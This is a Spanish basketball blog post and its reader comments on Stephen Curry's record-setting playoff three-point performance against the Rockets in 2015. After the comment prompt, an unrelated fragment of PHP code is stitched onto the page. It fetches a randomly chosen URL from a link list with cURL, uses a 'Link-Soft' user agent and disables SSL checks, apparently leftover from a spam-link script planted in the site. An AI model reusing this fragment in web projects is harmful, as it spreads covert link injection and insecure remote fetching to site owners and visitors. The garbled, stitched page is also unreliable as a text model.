La Crónica: El ángel exterminador

24 de May de 2015 por TheDeerHunter

Con la misma sonrisa que podría mostrar tu hijo si le regalas un balón de baloncesto, se dirijía Stephen Curry a un aficionado de la primera fila que le trataba de estorbar en su enésimo canastón del tercer cuarto. “Sit Down”, le sugería. Por si hubieran sospechas si se había ayudado de la suerte, en la jugada siguiente repetía el triple desde el mismo punto, justo al lado del hombre que ya se había sentado en su asiento. Curry tarda 4 décimas en ejecutar ese tipo de lanzamientos, con un acierto desde la misma esquina izquierda de “tan sólo” un 91% durante estos playoffs. Se volvía hacía la grada y toda ella permanecía en su asiento, rendida a su talento.

“Tiempo de killer, tiempo de Miller” que decía Andrés. Anoche Curry pulverizaba el récord de triples en postemporada que había establecido Reggie Miller en los playoffs de la 1999/2000, con 58 triples. Curry lo veía y subía a 65, pero en 9 partidos menos. Si se confirma que alcanza la finalísima y a este ritmo el récord puede quedar en cifras monstruosas. Hablando de tiempo de killer, Curry ha mejorado en 6 puntos sus promedios de anotación respecto a la regular que la permitido ganar el MVP.

Lo más brutal del asunto es que el grueso de la descomunal actuación del “Artista” en el Toyota Center anoche se produce en menos de dos cuartos. Tras su descanso entre el primer y segundo cuarto (saltaba a cancha en el minuto 2) hasta sentarse al final del tercero, con el partido sentenciado. Su segunda canasta se producía a falta de 5’56 para el descanso, aunque antes de alcanzarlo iba a anotar 15 puntos y provocar dos faltas clave a Dwight Howard que estaba siendo el mejor de los locales. En una de ellas le había ganado el rebote ofensivo… En el tercer cuarto es cuando destapaba el tarro de las esencias de su talento para meterlas de todos los colores, olores y sabores. Obra de arte, tras obra de arte.

Pero no todos los males de Houston se explican por la portentosa actuación de Curry. Como le había pasado a Atlanta el día anterior el apagón ofensivo fue generalizado, empezando por James Harden quien únicamente fue capaz de producir a través del montón de tiros libres que acostumbra a tirar. Los Rockets no alcanzaron un 34% en tiros de campo y apenas superaron el 60% de tiros libres. Si los Warriors evitan las pérdidas como hicieron ayer los Rockets tienen pocos argumentos para oponerles.

Salvo catástrofe impensable la final de la NBA está cantada.

Comenta

4 comentarios a esta entrada

  1. iker dice:
    #1

    me gustaria saber la opinion de nowitzki al respecto de esto, el que decia lo del peor mvp de todos los tiempos.

      Citar

  2. Futurman dice:
    #2

    Tampoco hay que ser ventajista, en la regular ha sido un MVP flojo (por que no le ha hecho falta) con números mediocres. En los POs cuando si le necesitan más, es cuando está rompiendo culos xDDD

      Citar

  3. TheDeerHunter dice:
    #3

    Una cosa es ser un MVP “flojo” y otra cosa muy distinta los números, que cada día que pasa está más claro que distorsionan de forma dramática la realidad.

    Hay una parte fundamental de las funciones de un base que no se contabilizan en ningún lado y todos sabemos lo mucho que influyen en el juego.
    Por otro lado los sistemas ofensivos de los Warriors impiden acumular muchas asistencias individualmente. No es lo mismo estar insistiendo todo el rato en el pick&roll donde un buen pasador se puede inflar a lo que hacen estos. John Stockton o Steve Nash no podrían firmar muchas más asistencias que Curry jugando de esta forma.

      Citar

  4. Ruxixón dice:
    #4

    Tirando de recuerdos de salas de juegos,lo de Curry ayer : FATALITY!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>